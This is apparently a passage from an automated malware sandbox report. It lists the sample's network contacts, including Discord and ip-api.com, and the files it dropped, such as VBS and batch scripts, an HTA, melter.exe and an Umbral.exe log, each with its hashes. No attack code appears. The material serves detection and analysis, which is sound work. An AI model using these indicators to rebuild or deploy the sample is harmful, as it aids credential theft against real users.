| US | 8.8.8.8:53 | ddl8.data.hu | udp |
| HU | 217.65.97.73:443 | ddl8.data.hu | tcp |
| US | 8.8.8.8:53 | 6.215.227.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.97.65.217.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\92BA.tmp\92BB.tmp\92BC.bat
| MD5 | 074b0499fa7df4238b66cf7f0ab1ca64 |
| SHA1 | 3ad09a2f3f51e5b4899397ec185672a6c0c4af18 |
| SHA256 | 48fdcc988fd0f193c920c28ba7a8414497a4190278c8c077fda92a5349290b48 |
| SHA512 | 496c6e1c462d40f5515ccf50b4ad7f14258782bc9329bad0c7776f4b22b66dd8790e181149604f87e816b865945dd4893c644b545aa84a4ed53ecfcabdca9686 |
memory/4132-2-0x000001E377C10000-0x000001E377C50000-memory.dmp
memory/4132-3-0x00007FFCC8413000-0x00007FFCC8415000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\21237.vbs
| MD5 | 330cc1c8e5f8505ae10af80b4f5a14ff |
| SHA1 | e2cfd3f7f1828b71d509b8f9c7e8d77c4bbb757d |
| SHA256 | 1bd62cfef609d139e16a29248b60ac259a6e83551975baf9c8078177ae2f9ce2 |
| SHA512 | 09d895f2293ae1157f62b8ac68bcd083941176e9312c6426d15a90e2b44d698e72553e2d02f209d6518d600c02790cbe3edbd909d97f47bae0834363d341651d |
C:\Users\Admin\AppData\Local\Temp\8377.vbs
| MD5 | 33aef3ef54ccdb5283776b01ad17b824 |
| SHA1 | e7c9b3022a966f2efeb5fec2c608679254495692 |
| SHA256 | c2fbabfc42e23dff770c425bf4a0fafaba1734a8a56fef25a38df7050161a8c8 |
| SHA512 | f9a8351eb5b44cba06cc514ce9cd25dbbfe70a5729386a7667896d39fc2e99f2afc9784321d02c7035e4020fe5b6780e5e9c1f4627b52921c2c258c9996bf367 |
C:\Users\Admin\AppData\Local\Temp\32417.vbs
| MD5 | 93e179454db6fe9ac81112193de37cde |
| SHA1 | 4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9 |
| SHA256 | 8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc |
| SHA512 | a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207 |
C:\Users\Admin\AppData\Local\Temp\21237.vbs
| MD5 | 135594160762ab9dd80794d7b34ab32a |
| SHA1 | 638fef88bbb5d310c51eda07ca10918a482ad3ac |
| SHA256 | 531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0 |
| SHA512 | 19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d |
memory/4960-100-0x00000133C1690000-0x00000133C16B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sta4nvyu.ucf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/4132-128-0x000001E37A3A0000-0x000001E37A416000-memory.dmp
memory/4132-129-0x000001E3798D0000-0x000001E379920000-memory.dmp
memory/4132-130-0x000001E37A460000-0x000001E37A47E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 74a6b79d36b4aae8b027a218bc6e1af7 |
| SHA1 | 0350e46c1df6934903c4820a00b0bc4721779e5f |
| SHA256 | 60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04 |
| SHA512 | 60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
memory/4132-166-0x000001E3798B0000-0x000001E3798BA000-memory.dmp
memory/4132-167-0x000001E379940000-0x000001E379952000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e6bee3b9128f2fe70aa3652f29737c89 |
| SHA1 | f8dd94ca11dbba72cb3455a44b205aebd4fd43c9 |
| SHA256 | 3eb65fecc9702196044cbd759a367a12c611e31f5376540d93a9b5ccf5970fde |
| SHA512 | d703288817394791cec3bbf3340a62ad970f94d1f5ac87a6e66097d6d90973cfb9877bad29e4e8a2c25c0c4c94ed33e217b68b81290cabc5df7f6fabaa096598 |
C:\Users\Admin\AppData\Local\Temp\14070.vbs
| MD5 | 3a7e0a94fa88dccd40d9b76b37d06db1 |
| SHA1 | d7604ddb660898ce3b1343aa712cf5926bc68bda |
| SHA256 | 368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4 |
| SHA512 | 19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb |
C:\Users\Admin\AppData\Local\Temp\30130.vbs
| MD5 | aabbe725da9751315bbeeda4ef58d816 |
| SHA1 | 476c78912d61e790a793c8e6606825f2b169947c |
| SHA256 | 0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360 |
| SHA512 | 0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd |
C:\Users\Admin\AppData\Local\Temp\risitas.hta
| MD5 | af25ddf889ed3804a85b487a95993a94 |
| SHA1 | e22ce7ce7e6b18400913de410be90fa79c2b6edb |
| SHA256 | bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab |
| SHA512 | 8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c |
C:\Users\Admin\AppData\Local\Temp\23646.vbs
| MD5 | 8a9b451fd9936100f33b576bb5ec3f02 |
| SHA1 | 80c92544f733ddfb96dffa296293fb2835e85f2e |
| SHA256 | 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455 |
| SHA512 | b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f |
C:\Users\Admin\AppData\Local\Temp\8377.vbs
| MD5 | 523092d53a06f5b46778a0cd7c01d0fb |
| SHA1 | 221a8244271afdbe7ce105aaf189f1dbcfa57cdb |
| SHA256 | 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e |
| SHA512 | 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb |
C:\Users\Admin\AppData\Local\Temp\3587.vbs
| MD5 | 39b6c6dd7cc01de2c2a9d23e527ec938 |
| SHA1 | ca0f5b1d37662032dd678140bdcedab9d9ddc87f |
| SHA256 | 4743696bab52f4e2809b7203cbda43675c6bd812bfac470cff2920f4a60c3cc2 |
| SHA512 | ba729bdc5b61184b221bd8f02d41f76499da62fb3343b00662094ee1dd77048ff0f3816745a979c8612785c9af7c733ba3f365f190a00d2df419ebe08106846a |
C:\Users\Admin\AppData\Local\Temp\1942.vbs
| MD5 | ec385d968eea8bf5abe4587305f39c89 |
| SHA1 | 6509b0bb7cb6432a4c723f37dc7593116ad57c64 |
| SHA256 | 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96 |
| SHA512 | d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Temp\12449.bat
| MD5 | 5348a4a50b6545f46afedfbb0f8a55ea |
| SHA1 | 2413757e4409f09d4f2e3151144bdc5a8a9cecce |
| SHA256 | d1735f45cf2b201bdc47d687f9d5b8a6e15838e5691d7fd33ede99a3fc3aacfb |
| SHA512 | cdfb247bb95737cb271d78a894545951c6e3b23cb73806dbbe11a5aacf71178674084197d921ba817bb70286badf94c0179c4cac52d7d679d1ab01978eca7ef3 |
C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg
| MD5 | 597cf1068c84a5c01afd9472a7453116 |
| SHA1 | bc9a638c47aab57b04b2257f421a48b2ee682732 |
| SHA256 | 0d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799 |
| SHA512 | 3eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600 |
C:\Users\Admin\AppData\Local\Temp\melter.exe
| MD5 | d9baac374cc96e41c9f86c669e53f61c |
| SHA1 | b0ba67bfac3d23e718b3bfdfe120e5446d0229e8 |
| SHA256 | a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412 |
| SHA512 | 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457 |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 15bb5c87f3beedb4f24e3e590c233700 |
| SHA1 | 0c4d076ef885bc9f2d57f5622d4dd80b781dfebf |
| SHA256 | 771178781c040efa4617ea46308f5e2270f957704c15f0018a41ccbece45a3e1 |
| SHA512 | d485867ed8b006a2eebaf54d11907ebbe40b870a15c8f0b92cda14ee663aad692dd7166a2ce71eaadc131483db7c10425c8f64bdfc90ab91e0524f42d12230e5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log
| MD5 | 547df619456b0e94d1b7663cf2f93ccb |
| SHA1 | 8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3 |
| SHA256 | 8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a |
| SHA512 | 01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6de2955025e69e425b762c951623bcfe |
| SHA1 | af1dfff33eaf5a66ae9e9374275874a0018638d3 |
| SHA256 | febc15f1ccad4b1e82b0334ef36ffb2fafe2d0111b25eb86f4d1130b8d3d76b4 |
| SHA512 | d05f6478af79daca6e2cf7a84ca78ab030293b1de00a14b858fe94b51b8781b9e33552b5d39e4688ae9ea61f97e5bb8c15bb479ad68f001184cef6fe535463e3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_F44A8781B6F141CBB1A818B233ABAF07.dat
| MD5 | aa4aef9dcdb83f7f08580d9ccd5d410f |
| SHA1 | d0bed89b0ff3521e035ebf79977f1ae5d29a7c68 |
| SHA256 | fe139d82df83d3ea407623680770288e711392b386e45f86070d68f6781c258f |
| SHA512 | 79eef6d39961e85129fa84610023319de4d665c9636264f53c50e61b174c1fc4a477f06b250b071bbfd9d1939e61a4cfa74fc5c25328ffaa5009c283966b7ce0 |